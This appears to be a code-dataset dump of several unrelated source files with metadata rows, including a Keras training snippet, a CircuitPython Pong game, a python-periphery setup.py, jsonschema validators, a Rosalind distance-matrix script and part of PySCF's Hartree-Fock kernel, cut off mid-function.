# Definition of the optimizer
sgd = optimizers.SGD(lr=0.15)

# Compile the model, which ends its definition.
model.compile(loss='binary_crossentropy',
              optimizer=sgd,  # using the stochastic gradient descent optimizer
              metrics=['accuracy'])
model.summary()
print(X.shape)

# Training of the network for 400 epochs.
history = model.fit(X, Y,
                    epochs=400,
                    batch_size=128,  # fix the batch size to 128 examples
                    verbose=1)

# Probe the trained neuron on inputs 0..99.
Xnew = np.zeros(shape=(100))
for i in range(0,Xnew.size):
    Xnew[i]=i
y_new = model.predict_proba(Xnew)
print(y_new[:,0].tolist())
# show the inputs and predicted outputs
for i in range(len(Xnew)):
    print("X=%s, Predicted=%s" % (Xnew[i], y_new[i]))

# BUG FIX: the original called plt.plot(x_dist, ...) but `x_dist` was never
# defined; the probed inputs live in `Xnew`.
plt.plot(Xnew,y_new,'ro',label='data')
plt.legend()
#plt.show()
| 27.045455
| 133
| 0.596639
|
4a1120d8a406ba0a251720d6504c60fb45bc4126
| 4,154
|
py
|
Python
|
pong/pong-solution.py
|
titimoby/gamebuino-python
|
d24ddae30177122fad5a9aa55ed90fc3571c5eee
|
[
"MIT"
] | null | null | null |
pong/pong-solution.py
|
titimoby/gamebuino-python
|
d24ddae30177122fad5a9aa55ed90fc3571c5eee
|
[
"MIT"
] | null | null | null |
pong/pong-solution.py
|
titimoby/gamebuino-python
|
d24ddae30177122fad5a9aa55ed90fc3571c5eee
|
[
"MIT"
] | null | null | null |
# ----------------------------------------------------------
# Pong
# Gamebuino Academy Workshop
#
# This is a CircuitPython port of the original C++ code
# Maybe not the more pythonic, but as close as possible
# to the original to be able to understand
# Original workshop: https://gamebuino.com/academy/workshop/make-your-very-first-games-with-pong/hello-world
# ----------------------------------------------------------
# Author: TitiMoby
# Date: May 2019
# ----------------------------------------------------------
import gamebuino_meta as gb
from random import randint

# ball attributes
ball_posX = 20
ball_posY = 20
ball_speedX = 1
ball_speedY = 1
ball_size = 3

# paddle1 attributes
paddle1_posX = 10
paddle1_posY = 30

# paddle2 attributes
paddle2_posX = gb.display.width() - 13
paddle2_posY = 30

# Dimensions for both paddles
paddle_height = 10
paddle_width = 3

# For the AI
paddle2_speedY = 0  # Vertical speed of the AI's paddle

# Scores
score1 = 0  # Player 1's score
score2 = 0  # Player 2's score

difficulty = 3  # Level of difficulty. 3 = EASY et 2 = HARD

while True:
    gb.waitForUpdate()
    gb.display.clear()

    # Difficulty switch
    if (gb.buttons.pressed(gb.buttons.MENU)):
        if (difficulty == 3):  # Easy
            difficulty = 2  # Change difficulty
        else:  # Hard
            difficulty = 3  # Change difficulty

    # Update paddle 1 (player controlled paddle)
    if (gb.buttons.repeat(gb.buttons.UP, 0)):
        paddle1_posY = paddle1_posY - 1
    if (gb.buttons.repeat(gb.buttons.DOWN, 0)):
        paddle1_posY = paddle1_posY + 1

    # Update paddle2 (AI controlled paddle)
    if (ball_posY > paddle2_posY + paddle_height / 2 and randint(0, difficulty) == 1):
        paddle2_speedY = 2
    elif (ball_posY < paddle2_posY + paddle_height / 2 and randint(0, difficulty) == 1):
        paddle2_speedY = -2
    paddle2_posY = paddle2_posY + paddle2_speedY  # Update paddle2's position

    # Update ball
    ball_posX = ball_posX + ball_speedX
    ball_posY = ball_posY + ball_speedY

    # Collisions with walls
    if (ball_posY < 0):
        ball_speedY = 1
    if (ball_posY > gb.display.height() - ball_size):
        ball_speedY = -1

    # Collision with paddle1
    if ( (ball_posX == paddle1_posX + paddle_width)
            and (ball_posY + ball_size >= paddle1_posY)
            and (ball_posY <= paddle1_posY + paddle_height) ):
        ball_speedX = 1

    # Collision with paddle2
    if ( (ball_posX + ball_size == paddle2_posX)
            and (ball_posY + ball_size >= paddle2_posY)
            and (ball_posY <= paddle2_posY + paddle_height) ):
        ball_speedX = -1

    # Check if the ball exited the screen
    if (ball_posX < 0):
        # Reset the ball
        ball_posX = 20
        ball_posY = randint(20, gb.display.height() - 20)  # Random position along the Y axis
        ball_speedX = 1
        # BUG FIX: randint(0, 2) == 1 was a 1-in-3 chance, not the 50% the
        # comments promise; randint(0, 1) gives a fair coin flip.
        if (randint(0, 1) == 1):  # 50% of the time, this is true
            ball_speedY = 1
        else:  # Other 50% of the time
            ball_speedY = -1
        # Increment player 2's score
        score2 = score2 + 1

    if (ball_posX > gb.display.width()):
        # Reset ball
        ball_posX = 20
        ball_posY = randint(20, gb.display.height() - 20)  # Random position along the Y axis
        ball_speedX = 1
        # BUG FIX: same fair-coin fix as above.
        if (randint(0, 1) == 1):  # 50% of the time, this is true
            ball_speedY = 1
        else:  # Other 50% of the time
            ball_speedY = -1
        # Increment player 1's score
        score1 = score1 + 1

    # Draw ball
    gb.display.fillRect(ball_posX, ball_posY, ball_size, ball_size)
    # Draw paddle1
    gb.display.fillRect(paddle1_posX, paddle1_posY, paddle_width, paddle_height)
    # Draw paddle2
    gb.display.fillRect(paddle2_posX, paddle2_posY, paddle_width, paddle_height)

    # Draw scores
    # gb.display.setCursor(35, 5)  # this method is not present in CircuitPython 0.0.5
    gb.display.print(35, 5, score1)
    # gb.display.setCursor(42, 5)  # this method is not present in CircuitPython 0.0.5
    gb.display.print(52, 5, score2)

    # Draw difficulty
    # gb.display.setCursor(33, gb.display.height() - 5)  # this method is not present in CircuitPython 0.0.5
    if (difficulty == 3):
        gb.display.print(33, gb.display.height() - 5, "EASY")
    else:
        gb.display.print(33, gb.display.height() - 5, "HARD")
| 29.460993
| 108
| 0.649976
|
4a1120f50406f00b0bbdd8318cf555e8aece5ba8
| 1,633
|
py
|
Python
|
setup.py
|
jonasl/python-periphery
|
37d2b6d10fdc0fa7779f94047e82d3bed4e79dac
|
[
"MIT"
] | 58
|
2020-07-23T09:56:16.000Z
|
2022-03-15T23:43:26.000Z
|
setup.py
|
jonasl/python-periphery
|
37d2b6d10fdc0fa7779f94047e82d3bed4e79dac
|
[
"MIT"
] | null | null | null |
setup.py
|
jonasl/python-periphery
|
37d2b6d10fdc0fa7779f94047e82d3bed4e79dac
|
[
"MIT"
] | 16
|
2020-06-09T15:57:39.000Z
|
2022-03-23T05:02:47.000Z
|
try:
    from setuptools import setup
except ImportError:
    # Fall back to distutils when setuptools is unavailable.
    from distutils.core import setup

# Trove classifiers advertised on PyPI.
_CLASSIFIERS = [
    'Development Status :: 5 - Production/Stable',
    'License :: OSI Approved :: MIT License',
    'Operating System :: POSIX :: Linux',
    'Programming Language :: Python',
    'Programming Language :: Python :: 2',
    'Programming Language :: Python :: 3',
    'Programming Language :: Python :: Implementation :: CPython',
    'Topic :: Software Development :: Libraries :: Python Modules',
    'Topic :: Software Development :: Embedded Systems',
    'Topic :: System :: Hardware',
    'Topic :: System :: Hardware :: Hardware Drivers',
]

setup(
    name='python-periphery',
    version='2.0.0',
    description='A pure Python 2/3 library for peripheral I/O (GPIO, LED, PWM, SPI, I2C, MMIO, Serial) in Linux.',
    author='vsergeev',
    author_email='v@sergeev.io',
    url='https://github.com/vsergeev/python-periphery',
    packages=['periphery'],
    long_description="""python-periphery is a pure Python library for GPIO, LED, PWM, SPI, I2C, MMIO, and Serial peripheral I/O interface access in userspace Linux. It is useful in embedded Linux environments (including Raspberry Pi, BeagleBone, etc. platforms) for interfacing with external peripherals. python-periphery is compatible with Python 2 and Python 3, is written in pure Python, and is MIT licensed. See https://github.com/vsergeev/python-periphery for more information.""",
    classifiers=_CLASSIFIERS,
    license='MIT',
    keywords='gpio spi led pwm i2c mmio serial uart embedded linux beaglebone raspberrypi rpi odroid',
)
| 52.677419
| 486
| 0.68218
|
4a1121aa0d5cbf908d33f7683b5f2c294c110e6b
| 11,600
|
py
|
Python
|
jsonschema/_validators.py
|
vsajip/jsonschema
|
dc9e996c5dc53963c82adf06c27583407ce1e462
|
[
"MIT"
] | 1
|
2017-09-02T00:37:49.000Z
|
2017-09-02T00:37:49.000Z
|
jsonschema/_validators.py
|
vsajip/jsonschema
|
dc9e996c5dc53963c82adf06c27583407ce1e462
|
[
"MIT"
] | null | null | null |
jsonschema/_validators.py
|
vsajip/jsonschema
|
dc9e996c5dc53963c82adf06c27583407ce1e462
|
[
"MIT"
] | null | null | null |
import re
from jsonschema import _utils
from jsonschema.exceptions import FormatError, ValidationError
from jsonschema.compat import iteritems
FLOAT_TOLERANCE = 10 ** -15
def patternProperties(validator, patternProperties, instance, schema):
    """Validate object members whose names match any regex pattern key."""
    if not validator.is_type(instance, "object"):
        return
    for pattern, subschema in iteritems(patternProperties):
        for key, value in iteritems(instance):
            if re.search(pattern, key) is None:
                continue
            for error in validator.descend(
                value, subschema, path=key, schema_path=pattern
            ):
                yield error
def additionalProperties(validator, aP, instance, schema):
    """Check members not covered by "properties"/"patternProperties"
    against the "additionalProperties" schema (or reject them if False)."""
    if not validator.is_type(instance, "object"):
        return
    extras = set(_utils.find_additional_properties(instance, schema))
    if validator.is_type(aP, "object"):
        for extra in extras:
            for error in validator.descend(instance[extra], aP, path=extra):
                yield error
    elif extras and not aP:
        error = "Additional properties are not allowed (%s %s unexpected)"
        yield ValidationError(error % _utils.extras_msg(extras))
def items(validator, items, instance, schema):
    """Validate array elements: one schema for all, or positional schemas."""
    if not validator.is_type(instance, "array"):
        return
    if validator.is_type(items, "object"):
        # A single schema applies to every element.
        for index, item in enumerate(instance):
            for error in validator.descend(item, items, path=index):
                yield error
        return
    # Tuple validation: pair elements with positional subschemas.
    for index, (item, subschema) in enumerate(zip(instance, items)):
        for error in validator.descend(
            item, subschema, path=index, schema_path=index
        ):
            yield error
def additionalItems(validator, aI, instance, schema):
    """Validate array elements beyond the positional "items" schemas."""
    if not validator.is_type(instance, "array"):
        return
    if validator.is_type(schema.get("items", {}), "object"):
        # A single "items" schema covers every element; nothing is "additional".
        return
    ntuple = len(schema.get("items", []))
    if validator.is_type(aI, "object"):
        for index, item in enumerate(instance[ntuple:]):
            for error in validator.descend(item, aI, path=index):
                yield error
    elif not aI and len(instance) > ntuple:
        error = "Additional items are not allowed (%s %s unexpected)"
        yield ValidationError(
            error %
            _utils.extras_msg(instance[ntuple:])
        )
def minimum(validator, minimum, instance, schema):
    """Enforce the "minimum" bound, honoring "exclusiveMinimum"."""
    if not validator.is_type(instance, "number"):
        return
    instance = float(instance)
    exclusive = schema.get("exclusiveMinimum", False)
    if exclusive:
        failed = instance <= minimum
        cmp = "less than or equal to"
    else:
        failed = instance < minimum
        cmp = "less than"
    if failed:
        yield ValidationError(
            "%r is %s the minimum of %r" % (instance, cmp, minimum)
        )
def maximum(validator, maximum, instance, schema):
    """Enforce the "maximum" bound, honoring "exclusiveMaximum"."""
    if not validator.is_type(instance, "number"):
        return
    instance = float(instance)
    exclusive = schema.get("exclusiveMaximum", False)
    if exclusive:
        failed = instance >= maximum
        cmp = "greater than or equal to"
    else:
        failed = instance > maximum
        cmp = "greater than"
    if failed:
        yield ValidationError(
            "%r is %s the maximum of %r" % (instance, cmp, maximum)
        )
def multipleOf(validator, dB, instance, schema):
    """Require *instance* to be an exact multiple of ``dB``; float divisors
    use FLOAT_TOLERANCE to absorb rounding noise."""
    if not validator.is_type(instance, "number"):
        return
    if isinstance(dB, float):
        mod = instance % dB
        failed = mod > FLOAT_TOLERANCE and (dB - mod) > FLOAT_TOLERANCE
    else:
        failed = instance % dB
    if failed:
        yield ValidationError("%r is not a multiple of %r" % (instance, dB))
def minItems(validator, mI, instance, schema):
    """Yield an error when array *instance* has fewer than ``mI`` items."""
    if not validator.is_type(instance, "array"):
        return
    if len(instance) < mI:
        yield ValidationError("%r is too short" % (instance,))
def maxItems(validator, mI, instance, schema):
    """Yield an error when array *instance* has more than ``mI`` items."""
    if not validator.is_type(instance, "array"):
        return
    if len(instance) > mI:
        yield ValidationError("%r is too long" % (instance,))
def uniqueItems(validator, uI, instance, schema):
    """When "uniqueItems" is truthy, reject arrays with duplicate elements."""
    if not uI:
        return
    if not validator.is_type(instance, "array"):
        return
    if not _utils.uniq(instance):
        yield ValidationError("%r has non-unique elements" % instance)
def pattern(validator, patrn, instance, schema):
    """Require string *instance* to contain a match for regex ``patrn``."""
    if not validator.is_type(instance, "string"):
        return
    if re.search(patrn, instance) is None:
        yield ValidationError("%r does not match %r" % (instance, patrn))
def format(validator, format, instance, schema):
    """Delegate string format checking to the validator's format_checker
    (a no-op when no checker is attached)."""
    checker = validator.format_checker
    if checker is None:
        return
    if not validator.is_type(instance, "string"):
        return
    try:
        checker.check(instance, format)
    except FormatError as error:
        yield ValidationError(error.message, cause=error.cause)
def minLength(validator, mL, instance, schema):
    """Yield an error when string *instance* is shorter than ``mL``."""
    if not validator.is_type(instance, "string"):
        return
    if len(instance) < mL:
        yield ValidationError("%r is too short" % (instance,))
def maxLength(validator, mL, instance, schema):
    """Yield an error when string *instance* is longer than ``mL``."""
    if not validator.is_type(instance, "string"):
        return
    if len(instance) > mL:
        yield ValidationError("%r is too long" % (instance,))
def dependencies(validator, dependencies, instance, schema):
    """Enforce property dependencies: a schema dependency re-validates the
    whole object; a name (or list of names) dependency requires those
    properties to be present too."""
    if not validator.is_type(instance, "object"):
        return
    for property, dependency in iteritems(dependencies):
        if property not in instance:
            continue
        if validator.is_type(dependency, "object"):
            for error in validator.descend(
                instance, dependency, schema_path=property
            ):
                yield error
            continue
        for name in _utils.ensure_list(dependency):
            if name not in instance:
                yield ValidationError(
                    "%r is a dependency of %r" % (name, property)
                )
def enum(validator, enums, instance, schema):
    """Require *instance* to be one of the enumerated values."""
    if instance in enums:
        return
    yield ValidationError("%r is not one of %r" % (instance, enums))
def ref(validator, ref, instance, schema):
    """Resolve a "$ref" and validate *instance* against the target schema."""
    with validator.resolver.resolving(ref) as resolved:
        for err in validator.descend(instance, resolved):
            yield err
def type_draft3(validator, types, instance, schema):
    """Draft 3 "type": accept "any", type names, or embedded schemas;
    succeed as soon as one candidate matches."""
    types = _utils.ensure_list(types)
    all_errors = []
    for index, candidate in enumerate(types):
        if candidate == "any":
            return
        if validator.is_type(candidate, "object"):
            errors = list(validator.descend(instance, candidate, schema_path=index))
            if not errors:
                return
            all_errors.extend(errors)
        elif validator.is_type(candidate, "string"):
            if validator.is_type(instance, candidate):
                return
    # No candidate accepted the instance.
    yield ValidationError(
        _utils.types_msg(instance, types), context=all_errors,
    )
def properties_draft3(validator, properties, instance, schema):
    """Draft 3 "properties": validate present members, and enforce the
    per-property "required" flag for absent ones."""
    if not validator.is_type(instance, "object"):
        return
    for property, subschema in iteritems(properties):
        if property in instance:
            errors = validator.descend(
                instance[property],
                subschema,
                path=property,
                schema_path=property,
            )
            for err in errors:
                yield err
            continue
        if not subschema.get("required", False):
            continue
        err = ValidationError("%r is a required property" % property)
        # Attach validator metadata and path info by hand, because this
        # error is synthesized here rather than produced by descend().
        err._set(
            validator="required",
            validator_value=subschema["required"],
            instance=instance,
            schema=schema,
        )
        err.path.appendleft(property)
        err.schema_path.extend([property, "required"])
        yield err
def disallow_draft3(validator, disallow, instance, schema):
    """Draft 3 "disallow": fail for each listed type the instance matches."""
    for disallowed in _utils.ensure_list(disallow):
        matches = validator.is_valid(instance, {"type" : [disallowed]})
        if matches:
            yield ValidationError(
                "%r is disallowed for %r" % (disallowed, instance)
            )
def extends_draft3(validator, extends, instance, schema):
    """Draft 3 "extends": validate against one schema or a list of them."""
    if validator.is_type(extends, "object"):
        for error in validator.descend(instance, extends):
            yield error
        return
    for index, subschema in enumerate(extends):
        for error in validator.descend(instance, subschema, schema_path=index):
            yield error
def type_draft4(validator, types, instance, schema):
    """Draft 4 "type": instance must match at least one listed type name."""
    types = _utils.ensure_list(types)
    for candidate in types:
        if validator.is_type(instance, candidate):
            return
    yield ValidationError(_utils.types_msg(instance, types))
def properties_draft4(validator, properties, instance, schema):
    """Draft 4 "properties": validate each member present in the instance."""
    if not validator.is_type(instance, "object"):
        return
    for property, subschema in iteritems(properties):
        if property not in instance:
            continue
        errors = validator.descend(
            instance[property],
            subschema,
            path=property,
            schema_path=property,
        )
        for err in errors:
            yield err
def required_draft4(validator, required, instance, schema):
    """Draft 4 "required": each listed property must exist on the object."""
    if not validator.is_type(instance, "object"):
        return
    missing = (p for p in required if p not in instance)
    for property in missing:
        yield ValidationError("%r is a required property" % property)
def minProperties_draft4(validator, mP, instance, schema):
    """Yield an error when object *instance* has fewer than ``mP`` members."""
    if not validator.is_type(instance, "object"):
        return
    if len(instance) < mP:
        yield ValidationError(
            "%r does not have enough properties" % (instance,)
        )
def maxProperties_draft4(validator, mP, instance, schema):
    """Yield an error when object *instance* has more than ``mP`` members.

    Fix: the original tested ``validator.is_type(instance, "object")``
    twice (an early return followed by the same check again); the second,
    redundant check is dropped — behavior is unchanged.
    """
    if not validator.is_type(instance, "object"):
        return
    if len(instance) > mP:
        yield ValidationError("%r has too many properties" % (instance,))
def allOf_draft4(validator, allOf, instance, schema):
    """Draft 4 "allOf": the instance must satisfy every subschema; forward
    every error produced."""
    for index, subschema in enumerate(allOf):
        errors = validator.descend(instance, subschema, schema_path=index)
        for error in errors:
            yield error
def oneOf_draft4(validator, oneOf, instance, schema):
    """Draft 4 "oneOf": the instance must validate against exactly one
    subschema — an error is yielded when none match, and another when more
    than one match."""
    subschemas = enumerate(oneOf)
    all_errors = []
    for index, subschema in subschemas:
        errs = list(validator.descend(instance, subschema, schema_path=index))
        if not errs:
            # First matching subschema; remembered for the "valid under
            # each of" report below.
            first_valid = subschema
            break
        all_errors.extend(errs)
    else:
        # Loop exhausted without a break: nothing validated.
        yield ValidationError(
            "%r is not valid under any of the given schemas" % (instance,),
            context=all_errors,
        )
    # NOTE: this comprehension keeps consuming the *same* `subschemas`
    # iterator, so only the subschemas after the first valid one are
    # rechecked here.  When the for-loop above exhausted the iterator (no
    # match), this list is empty and the then-unbound `first_valid` is
    # never touched.
    more_valid = [s for i, s in subschemas if validator.is_valid(instance, s)]
    if more_valid:
        more_valid.append(first_valid)
        reprs = ", ".join(repr(schema) for schema in more_valid)
        yield ValidationError(
            "%r is valid under each of %s" % (instance, reprs)
        )
def anyOf_draft4(validator, anyOf, instance, schema):
    """Draft 4 "anyOf": succeed as soon as any subschema validates; report
    the accumulated errors when none does."""
    all_errors = []
    for index, subschema in enumerate(anyOf):
        errs = list(validator.descend(instance, subschema, schema_path=index))
        if not errs:
            # One subschema accepted the instance — done.
            return
        all_errors.extend(errs)
    yield ValidationError(
        "%r is not valid under any of the given schemas" % (instance,),
        context=all_errors,
    )
def not_draft4(validator, not_schema, instance, schema):
    """Draft 4 "not": the instance must NOT validate against the schema."""
    if not validator.is_valid(instance, not_schema):
        return
    yield ValidationError(
        "%r is not allowed for %r" % (not_schema, instance)
    )
| 31.955923
| 79
| 0.618448
|
4a11229346e75e67a5eeebca050f01f5a9492af3
| 120
|
py
|
Python
|
maskrcnn_benchmark/modeling/backbone/__init__.py
|
chenzhutian/auto-infog-timeline
|
0e524d5045aa0c925bbf1d8803782169735a4597
|
[
"MIT"
] | 10
|
2019-10-01T08:33:41.000Z
|
2021-09-03T18:09:51.000Z
|
maskrcnn_benchmark/modeling/backbone/__init__.py
|
PaParaZz1/auto-infog-timeline
|
9f7dd5ef939a6955c69b7ce329b3b87fff89f6f5
|
[
"MIT"
] | 1
|
2019-12-30T13:05:24.000Z
|
2019-12-30T13:05:24.000Z
|
maskrcnn_benchmark/modeling/backbone/__init__.py
|
PaParaZz1/auto-timeline-v2
|
b01e6efdaeb2f63da449844ec818d21ed305c4cf
|
[
"MIT"
] | 2
|
2020-12-21T18:42:08.000Z
|
2021-11-30T15:24:27.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
from .backbone import build_backbone, ResNetXFPN
| 60
| 71
| 0.8
|
4a1123f9ad50199edc79850f3b0679bbc5120676
| 1,353
|
py
|
Python
|
scripts/pdst.py
|
akikuno/rosalind
|
7015dc63e493d870e5789e99f2ee523a9b1f5ab9
|
[
"MIT"
] | null | null | null |
scripts/pdst.py
|
akikuno/rosalind
|
7015dc63e493d870e5789e99f2ee523a9b1f5ab9
|
[
"MIT"
] | null | null | null |
scripts/pdst.py
|
akikuno/rosalind
|
7015dc63e493d870e5789e99f2ee523a9b1f5ab9
|
[
"MIT"
] | null | null | null |
# https://rosalind.info/problems/pdst/
def fmtfa(fasta: list):
    """Split raw FASTA lines into parallel (headers, sequences) lists.

    Lines containing ">" start a new record (the ">" is stripped from the
    header); subsequent lines are concatenated into that record's sequence.
    """
    headers = []
    seqs = []
    expecting_new = True
    for line in fasta:
        if ">" in line:
            headers.append(line[1:])
            expecting_new = True
        elif expecting_new:
            seqs.append(line)
            expecting_new = False
        else:
            seqs[-1] += line
    return headers, seqs
# INPUT -------------------------------------------
def _read_lines(path):
    """Read *path* and return its lines without trailing newlines."""
    with open(path) as handle:
        return handle.read().splitlines()

file_in = "sample/dataset/pdst.txt"
file_out = "sample/output/pdst.txt"
data = _read_lines(file_in)
outcome = _read_lines(file_out)
file_in = "case/dataset/pdst.txt"
data_case = _read_lines(file_in)
# Prefer the real case dataset when it is non-empty.
if data_case:
    data = data_case
# MAIN -------------------------------------------
_, seq = fmtfa(data)
def dist(seq1, seq2):
    """Return the p-distance: fraction of positions where the two equal-length
    sequences differ (raises IndexError if seq2 is shorter than seq1)."""
    total = len(seq1)
    mismatched = sum(1 for i in range(total) if seq1[i] != seq2[i])
    return mismatched / total
n = len(seq)
# Pairwise p-distance matrix, flattened row by row.
ans = [dist(a, b) for a in seq for b in seq]
# Format one space-separated row per sequence.
tmp = [" ".join(str(x) for x in ans[start:start + n])
       for start in range(0, len(ans), n)]
ans = "\n".join(tmp)
# OUTPUT -------------------------------------------
with open("case/output/pdst.txt", "w") as f:
    f.write(ans)
# END
| 18.534247
| 54
| 0.473762
|
4a112449855f2c8ae46fee4ce7db3c53cbf2a071
| 73,168
|
py
|
Python
|
pyscf/scf/hf.py
|
tepl/pyscf
|
503dcae94ca19d37f0146fa988ec77cf60954def
|
[
"Apache-2.0"
] | null | null | null |
pyscf/scf/hf.py
|
tepl/pyscf
|
503dcae94ca19d37f0146fa988ec77cf60954def
|
[
"Apache-2.0"
] | null | null | null |
pyscf/scf/hf.py
|
tepl/pyscf
|
503dcae94ca19d37f0146fa988ec77cf60954def
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
Hartree-Fock
'''
import sys
import tempfile
import time
from functools import reduce
import numpy
import scipy.linalg
import h5py
from pyscf import gto
from pyscf import lib
from pyscf.lib import logger
from pyscf.scf import diis
from pyscf.scf import _vhf
from pyscf.scf import chkfile
from pyscf.data import nist
from pyscf import __config__
WITH_META_LOWDIN = getattr(__config__, 'scf_analyze_with_meta_lowdin', True)
PRE_ORTH_METHOD = getattr(__config__, 'scf_analyze_pre_orth_method', 'ANO')
MO_BASE = getattr(__config__, 'MO_BASE', 1)
TIGHT_GRAD_CONV_TOL = getattr(__config__, 'scf_hf_kernel_tight_grad_conv_tol', True)
MUTE_CHKFILE = getattr(__config__, 'scf_hf_SCF_mute_chkfile', False)
# For code compatibility in python-2 and python-3
if sys.version_info >= (3,):
unicode = str
def kernel(mf, conv_tol=1e-10, conv_tol_grad=None,
           dump_chk=True, dm0=None, callback=None, conv_check=True, **kwargs):
    '''kernel: the SCF driver.

    Args:
        mf : an instance of SCF class
            mf object holds all parameters to control SCF.  One can modify its
            member functions to change the behavior of SCF.  The member
            functions which are called in kernel are

            | mf.get_init_guess
            | mf.get_hcore
            | mf.get_ovlp
            | mf.get_veff
            | mf.get_fock
            | mf.get_grad
            | mf.eig
            | mf.get_occ
            | mf.make_rdm1
            | mf.energy_tot
            | mf.dump_chk

    Kwargs:
        conv_tol : float
            converge threshold.
        conv_tol_grad : float
            gradients converge threshold.
        dump_chk : bool
            Whether to save SCF intermediate results in the checkpoint file
        dm0 : ndarray
            Initial guess density matrix.  If not given (the default), the
            kernel takes the density matrix generated by ``mf.get_init_guess``.
        callback : function(envs_dict) => None
            callback function takes one dict as the argument which is
            generated by the builtin function :func:`locals`, so that the
            callback function can access all local variables in the current
            environment.
        conv_check : bool
            Run an extra diagonalization after convergence (removes level
            shift) and re-check convergence with loosened thresholds.

    Returns:
        A list : scf_conv, e_tot, mo_energy, mo_coeff, mo_occ

        scf_conv : bool
            True means SCF converged
        e_tot : float
            Hartree-Fock energy of last iteration
        mo_energy : 1D float array
            Orbital energies.  Depending the eig function provided by mf
            object, the orbital energies may NOT be sorted.
        mo_coeff : 2D array
            Orbital coefficients.
        mo_occ : 1D array
            Orbital occupancies.  The occupancies may NOT be sorted from
            large to small.

    Examples:

    >>> from pyscf import gto, scf
    >>> mol = gto.M(atom='H 0 0 0; H 0 0 1.1', basis='cc-pvdz')
    >>> conv, e, mo_e, mo, mo_occ = scf.hf.kernel(scf.hf.SCF(mol), dm0=numpy.eye(mol.nao_nr()))
    >>> print('conv = %s, E(HF) = %.12f' % (conv, e))
    conv = True, E(HF) = -1.081170784378
    '''
    if 'init_dm' in kwargs:
        raise RuntimeError('''
You see this error message because of the API updates in pyscf v0.11.
Keyword argument "init_dm" is replaced by "dm0"''')
    # BUG FIX: time.clock() was removed in Python 3.8.  Use process_time()
    # (same CPU-time semantics) when available; fall back for Python 2.
    if hasattr(time, 'process_time'):
        cput0 = (time.process_time(), time.time())
    else:
        cput0 = (time.clock(), time.time())
    if conv_tol_grad is None:
        conv_tol_grad = numpy.sqrt(conv_tol)
        logger.info(mf, 'Set gradient conv threshold to %g', conv_tol_grad)

    mol = mf.mol
    if dm0 is None:
        dm = mf.get_init_guess(mol, mf.init_guess)
    else:
        dm = dm0

    h1e = mf.get_hcore(mol)
    vhf = mf.get_veff(mol, dm)
    e_tot = mf.energy_tot(dm, h1e, vhf)
    logger.info(mf, 'init E= %.15g', e_tot)

    scf_conv = False
    mo_energy = mo_coeff = mo_occ = None

    s1e = mf.get_ovlp(mol)
    cond = lib.cond(s1e)
    logger.debug(mf, 'cond(S) = %s', cond)
    if numpy.max(cond)*1e-17 > conv_tol:
        logger.warn(mf, 'Singularity detected in overlap matrix (condition number = %4.3g). '
                    'SCF may be inaccurate and hard to converge.', numpy.max(cond))

    # Skip SCF iterations. Compute only the total energy of the initial density
    if mf.max_cycle <= 0:
        fock = mf.get_fock(h1e, s1e, vhf, dm)  # = h1e + vhf, no DIIS
        mo_energy, mo_coeff = mf.eig(fock, s1e)
        mo_occ = mf.get_occ(mo_energy, mo_coeff)
        return scf_conv, e_tot, mo_energy, mo_coeff, mo_occ

    # Pick the DIIS accelerator: a user-provided instance, a fresh one, or none.
    if isinstance(mf.diis, lib.diis.DIIS):
        mf_diis = mf.diis
    elif mf.diis:
        assert issubclass(mf.DIIS, lib.diis.DIIS)
        mf_diis = mf.DIIS(mf, mf.diis_file)
        mf_diis.space = mf.diis_space
        mf_diis.rollback = mf.diis_space_rollback
    else:
        mf_diis = None

    if dump_chk and mf.chkfile:
        # Explicit overwrite the mol object in chkfile
        # Note in pbc.scf, mf.mol == mf.cell, cell is saved under key "mol"
        chkfile.save_mol(mol, mf.chkfile)

    # A preprocessing hook before the SCF iteration
    mf.pre_kernel(locals())

    cput1 = logger.timer(mf, 'initialize scf', *cput0)
    for cycle in range(mf.max_cycle):
        dm_last = dm
        last_hf_e = e_tot

        fock = mf.get_fock(h1e, s1e, vhf, dm, cycle, mf_diis)
        mo_energy, mo_coeff = mf.eig(fock, s1e)
        mo_occ = mf.get_occ(mo_energy, mo_coeff)
        dm = mf.make_rdm1(mo_coeff, mo_occ)
        # attach mo_coeff and mo_occ to dm to improve DFT get_veff efficiency
        dm = lib.tag_array(dm, mo_coeff=mo_coeff, mo_occ=mo_occ)
        vhf = mf.get_veff(mol, dm, dm_last, vhf)
        e_tot = mf.energy_tot(dm, h1e, vhf)

        # Here Fock matrix is h1e + vhf, without DIIS.  Calling get_fock
        # instead of the statement "fock = h1e + vhf" because Fock matrix may
        # be modified in some methods.
        fock = mf.get_fock(h1e, s1e, vhf, dm)  # = h1e + vhf, no DIIS
        norm_gorb = numpy.linalg.norm(mf.get_grad(mo_coeff, mo_occ, fock))
        if not TIGHT_GRAD_CONV_TOL:
            norm_gorb = norm_gorb / numpy.sqrt(norm_gorb.size)
        norm_ddm = numpy.linalg.norm(dm-dm_last)
        logger.info(mf, 'cycle= %d E= %.15g delta_E= %4.3g |g|= %4.3g |ddm|= %4.3g',
                    cycle+1, e_tot, e_tot-last_hf_e, norm_gorb, norm_ddm)

        if callable(mf.check_convergence):
            scf_conv = mf.check_convergence(locals())
        elif abs(e_tot-last_hf_e) < conv_tol and norm_gorb < conv_tol_grad:
            scf_conv = True

        if dump_chk:
            mf.dump_chk(locals())

        if callable(callback):
            callback(locals())

        cput1 = logger.timer(mf, 'cycle= %d'%(cycle+1), *cput1)
        if scf_conv:
            break

    if scf_conv and conv_check:
        # An extra diagonalization, to remove level shift
        #fock = mf.get_fock(h1e, s1e, vhf, dm)  # = h1e + vhf
        mo_energy, mo_coeff = mf.eig(fock, s1e)
        mo_occ = mf.get_occ(mo_energy, mo_coeff)
        dm, dm_last = mf.make_rdm1(mo_coeff, mo_occ), dm
        dm = lib.tag_array(dm, mo_coeff=mo_coeff, mo_occ=mo_occ)
        vhf = mf.get_veff(mol, dm, dm_last, vhf)
        e_tot, last_hf_e = mf.energy_tot(dm, h1e, vhf), e_tot

